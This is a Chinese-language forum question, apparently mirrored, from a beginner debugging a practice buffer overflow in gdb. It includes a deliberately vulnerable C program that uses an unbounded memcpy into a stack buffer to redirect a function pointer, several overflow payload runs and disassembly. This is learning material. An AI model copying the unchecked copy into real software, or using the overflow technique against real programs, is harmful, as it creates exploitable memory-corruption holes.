为什么我的 gdb 转换为错误的十六进制值？

如何解决为什么我的 gdb 转换为错误的十六进制值？

(gdb) run `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Starting program: /home/xxx/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Off to 0x56556155
Program received signal SIGSEGV,Segmentation fault.
0x56556155 in register_tm_clones ()


(gdb) run `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Off to 0x55618dc3
Program received signal SIGSEGV,Segmentation fault.
0x55618dc3 in ?? ()

当我在有效载荷中包含 \x55\x61\x55\x56 时，我在 0x56556155 处得到分段错误，但是当我在有效载荷中包括 \xcd\x61\x55\x56 时，我在 0x55618dc3 处得到分段错误。 我在想 \xcd\x61\x55\x56 会给 seg。故障在 0x565561cd。 当我在 Arch Linux 中使用 gdb 时，我只能重现这个。在 Kali linux 中，这按预期工作，我成功地通过覆盖 EBP 来运行一个函数，但在 Arch linux 中却没有。

另一个不起作用的有效负载示例：

(gdb) run `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Off to 0x5561aac2
Program received signal SIGSEGV,Segmentation fault.
0x5561aac2 in ?? ()

源代码：

#include <stdio.h>
#include <string.h>

int BUFFER=500;

void win(void){
    /*Win Condition
      We Want to jump here
    */
    printf("\n ===== Win ===== \n\n");
}

void lose(void){
    /* Lose Condition */
    printf("Current Memory Address is %p\n",lose);
    printf("Aim for %p\n",win);
    printf("Lose :(\n");
}

int main(int argc,char* argv[]){
    /* Main Function*/

    //Pointer to the lose function
    void (*fp)(void) = lose;

    char buffer[BUFFER];

    if (argc != 2){
    printf("Overflow the buffer\n");
    printf("Hint! Try `python -c \"print 'A'*100\"`\n");
    return -1;
    }

    memcpy(buffer,argv[1],strlen(argv[1]));
    printf("Off to %p\n",fp);
    fp();

    return 0;
}

拆解：

(gdb) disassemble main
Dump of assembler code for function main:
   0x56556254 <+0>: lea    ecx,[esp+0x4]
   0x56556258 <+4>: and    esp,0xfffffff0
   0x5655625b <+7>: push   DWORD PTR [ecx-0x4]
   0x5655625e <+10>:    push   ebp
   0x5655625f <+11>:    mov    ebp,esp
   0x56556261 <+13>:    push   edi
   0x56556262 <+14>:    push   esi
   0x56556263 <+15>:    push   ebx
   0x56556264 <+16>:    push   ecx
   0x56556265 <+17>:    sub    esp,0x18
   0x56556268 <+20>:    call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x5655626d <+25>:    add    ebx,0x2d93
   0x56556273 <+31>:    mov    esi,ecx
   0x56556275 <+33>:    mov    eax,esp
   0x56556277 <+35>:    mov    edi,eax
   0x56556279 <+37>:    lea    eax,[ebx-0x2e08]
   0x5655627f <+43>:    mov    DWORD PTR [ebp-0x1c],eax
   0x56556282 <+46>:    mov    eax,DWORD PTR [ebx+0x28]
   0x56556288 <+52>:    lea    edx,[eax-0x1]
   0x5655628b <+55>:    mov    DWORD PTR [ebp-0x20],edx
   0x5655628e <+58>:    mov    edx,eax
   0x56556290 <+60>:    mov    eax,0x10
   0x56556295 <+65>:    sub    eax,0x1
   0x56556298 <+68>:    add    eax,edx
   0x5655629a <+70>:    mov    ecx,0x10
   0x5655629f <+75>:    mov    edx,0x0
   0x565562a4 <+80>:    div    ecx
   0x565562a6 <+82>:    imul   eax,eax,0x10
   0x565562a9 <+85>:    sub    esp,eax
   0x565562ab <+87>:    mov    eax,esp
   0x565562ad <+89>:    add    eax,0x0
   0x565562b0 <+92>:    mov    DWORD PTR [ebp-0x24],eax
   0x565562b3 <+95>:    cmp    DWORD PTR [esi],0x2
   0x565562b6 <+98>:    je     0x565562e3 <main+143>
   0x565562b8 <+100>:   sub    esp,0xc
   0x565562bb <+103>:   lea    eax,[ebx-0x1fb2]
   0x565562c1 <+109>:   push   eax
   0x565562c2 <+110>:   call   0x56556060 <puts@plt>
   0x565562c7 <+115>:   add    esp,0x10
   0x565562ca <+118>:   sub    esp,0xc
   0x565562cd <+121>:   lea    eax,[ebx-0x1f9c]
   0x565562d3 <+127>:   push   eax
   0x565562d4 <+128>:   call   0x56556060 <puts@plt>
   0x565562d9 <+133>:   add    esp,0x10
   0x565562dc <+136>:   mov    eax,0xffffffff
   0x565562e1 <+141>:   jmp    0x5655632e <main+218>
   0x565562e3 <+143>:   mov    eax,DWORD PTR [esi+0x4]
   0x565562e6 <+146>:   add    eax,0x4
   0x565562e9 <+149>:   mov    eax,DWORD PTR [eax]
   0x565562eb <+151>:   sub    esp,0xc
   0x565562ee <+154>:   push   eax
   0x565562ef <+155>:   call   0x56556070 <strlen@plt>
   0x565562f4 <+160>:   add    esp,0x10
   0x565562f7 <+163>:   mov    edx,DWORD PTR [esi+0x4]
   0x565562fa <+166>:   add    edx,0x4
   0x565562fd <+169>:   mov    edx,DWORD PTR [edx]
   0x565562ff <+171>:   sub    esp,0x4
   0x56556302 <+174>:   push   eax
   0x56556303 <+175>:   push   edx
   0x56556304 <+176>:   push   DWORD PTR [ebp-0x24]
   0x56556307 <+179>:   call   0x56556050 <memcpy@plt>
   0x5655630c <+184>:   add    esp,0x10
   0x5655630f <+187>:   sub    esp,0x8
   0x56556312 <+190>:   push   DWORD PTR [ebp-0x1c]
   0x56556315 <+193>:   lea    eax,[ebx-0x1f76]
   0x5655631b <+199>:   push   eax
   0x5655631c <+200>:   call   0x56556040 <printf@plt>
   0x56556321 <+205>:   add    esp,0x10
   0x56556324 <+208>:   mov    eax,DWORD PTR [ebp-0x1c]
   0x56556327 <+211>:   call   eax
   0x56556329 <+213>:   mov    eax,0x0
   0x5655632e <+218>:   mov    esp,edi
   0x56556330 <+220>:   lea    esp,[ebp-0x10]
   0x56556333 <+223>:   pop    ecx
   0x56556334 <+224>:   pop    ebx
   0x56556335 <+225>:   pop    esi
   0x56556336 <+226>:   pop    edi
   0x56556337 <+227>:   pop    ebp
   0x56556338 <+228>:   lea    esp,[ecx-0x4]
   0x5655633b <+231>:   ret
End of assembler dump.


(gdb) disassemble lose
Dump of assembler code for function win:
   0x565561cd <+0>: push   ebp
   0x565561ce <+1>: mov    ebp,esp
   0x565561d0 <+3>: push   ebx
   0x565561d1 <+4>: sub    esp,0x4
   0x565561d4 <+7>: call   0x5655633c <__x86.get_pc_thunk.ax>
   0x565561d9 <+12>:    add    eax,0x2e27
   0x565561de <+17>:    sub    esp,0xc
   0x565561e1 <+20>:    lea    edx,[eax-0x1ff8]
   0x565561e7 <+26>:    push   edx
   0x565561e8 <+27>:    mov    ebx,eax
   0x565561ea <+29>:    call   0x56556060 <puts@plt>
   0x565561ef <+34>:    add    esp,0x10
   0x565561f2 <+37>:    nop
   0x565561f3 <+38>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x565561f6 <+41>:    leave
   0x565561f7 <+42>:    ret
End of assembler dump.

(gdb) disassemble lose
Dump of assembler code for function lose:
   0x565561f8 <+0>: push   ebp
   0x565561f9 <+1>: mov    ebp,esp
   0x565561fb <+3>: push   ebx
   0x565561fc <+4>: sub    esp,0x4
   0x565561ff <+7>: call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556204 <+12>:    add    ebx,0x2dfc
   0x5655620a <+18>:    sub    esp,0x8
   0x5655620d <+21>:    lea    eax,[ebx-0x2e08]
   0x56556213 <+27>:    push   eax
   0x56556214 <+28>:    lea    eax,[ebx-0x1fe4]
   0x5655621a <+34>:    push   eax
   0x5655621b <+35>:    call   0x56556040 <printf@plt>
   0x56556220 <+40>:    add    esp,0x10
   0x56556223 <+43>:    sub    esp,0x8
   0x56556226 <+46>:    lea    eax,[ebx-0x2e33]
   0x5655622c <+52>:    push   eax
   0x5655622d <+53>:    lea    eax,[ebx-0x1fc6]
   0x56556233 <+59>:    push   eax
   0x56556234 <+60>:    call   0x56556040 <printf@plt>
   0x56556239 <+65>:    add    esp,0x10
   0x5655623c <+68>:    sub    esp,0xc
   0x5655623f <+71>:    lea    eax,[ebx-0x1fba]
   0x56556245 <+77>:    push   eax
   0x56556246 <+78>:    call   0x56556060 <puts@plt>
   0x5655624b <+83>:    add    esp,0x10
   0x5655624e <+86>:    nop
   0x5655624f <+87>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x56556252 <+90>:    leave
   0x56556253 <+91>:    ret
End of assembler dump.

我做错了什么？我对汇编语言和缓冲区溢出很陌生，请放轻松。

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 dio@foxmail.com 举报，一经查实，本站将立刻删除。